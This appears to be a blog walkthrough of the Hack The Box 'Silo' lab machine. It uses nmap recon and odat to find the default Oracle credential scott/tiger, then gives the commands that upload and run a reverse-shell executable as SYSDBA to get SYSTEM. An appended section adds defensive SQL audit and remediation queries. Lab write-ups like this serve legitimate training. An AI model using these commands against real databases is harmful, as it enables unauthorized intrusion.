Flydragon's Blog
[HTB] Silo Walkthrough


Introduction

This machine is Silo from Hack The Box; its difficulty is Medium.

Techniques used:

  1. Penetrating an Oracle database with odat

Attacker: 10.10.16.2
Target: 10.10.10.82

Recon

  1. nmap
sudo nmap -sV -sC 10.10.10.82
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -3m49s, deviation: 0s, median: -3m49s
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-12T02:38:38
|_  start_date: 2024-04-12T02:27:39
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported

Scan SMB once more

sudo nmap -sV -sC -p445 --script=smb-vuln* 10.10.10.82
Host script results:
|_smb-vuln-ms10-061: No accounts left to try
|_smb-vuln-ms10-054: false

smbclient, smbmap and dirsearch did not turn up anything, so switch targets and take a look at oracle-tns

  2. odat

This article is a good reference; it is clearly written
https://www.whiteoaksecurity.com/blog/exploiting-oracle-databases-with-odat/

sudo odat all -s 10.10.10.82

After a long wait, this credential comes back

[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

Exploit

From odat's GitHub page (or -h), the utlfile module can be used to upload/download/delete files.
Try uploading a reverse shell.

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /test reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe 

Insufficient privileges

[-] Impossible to put the ../../Windows_tools/reverse-shell.exe file: `ORA-01031: insufficient privileges`

Try adding the sysdba flag

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /test reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe --sysdba

Still no luck; the other two modules that can upload files also failed

[-] Impossible to put the /home/kali/HTB/Windows_tools/reverse-shell.exe file: `ORA-29283: invalid file operation ORA-06512: at "SYS.UTL_FILE", line 536 ORA-29283: invalid file operation ORA-06512: at line 1`

In the end, the upload only succeeded after switching to a different upload path

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /temp reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe --sysdba

Next, execute the uploaded shell

odat externaltable -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --exec /temp reverse-shell.exe --sysdba

Execution succeeded! But no shell came back, which was strange.
Generating a new shell fixed it, though; false alarm.
Got SYSTEM directly.
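
The chain above depends on an open default account (scott/tiger) that is allowed to connect with --sysdba, plus server-side file access through UTL_FILE and directory objects. The following audit queries are an added example, not part of the original post, that a DBA could run in SQL*Plus to find those conditions on their own instance; they assume a DBA session on an 11g-or-later database and use only standard data dictionary views.

```sql
-- Added hardening audit (not from the original walkthrough). Run as a DBA.

-- 1. Open accounts still using a shipped default password (scott/tiger is one).
SELECT d.username, u.account_status
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
WHERE  u.account_status = 'OPEN'
ORDER  BY d.username;

-- 2. Password-file entries that may connect AS SYSDBA / SYSOPER.
--    Normally only SYS belongs here; a demo or application account is a finding.
SELECT username, sysdba, sysoper
FROM   v$pwfile_users
WHERE  username <> 'SYS';

-- 3. Grantees that can execute UTL_FILE (server-side file read/write).
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'UTL_FILE'
ORDER  BY grantee;

-- 4. Grantees that can create directory objects pointing at arbitrary OS paths.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE ANY DIRECTORY', 'DROP ANY DIRECTORY')
ORDER  BY grantee;

-- 5. Existing directory objects; review any path nobody recognises.
SELECT owner, directory_name, directory_path
FROM   dba_directories
ORDER  BY directory_name;

-- Remediation for the account seen in this walkthrough. Review first:
-- the REVOKE raises an error if query 2 did not list SCOTT.
ALTER USER scott ACCOUNT LOCK PASSWORD EXPIRE;
REVOKE SYSDBA FROM scott;
```

Any row from query 1 or query 2 means the listener on 1521 should not be reachable from untrusted networks until the account is locked or its password changed.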

[HTB] Silo Walkthrough
https://flydragonw.github.io/posts/htb_silo/
Author
FlyDragon
Published at
2024-04-14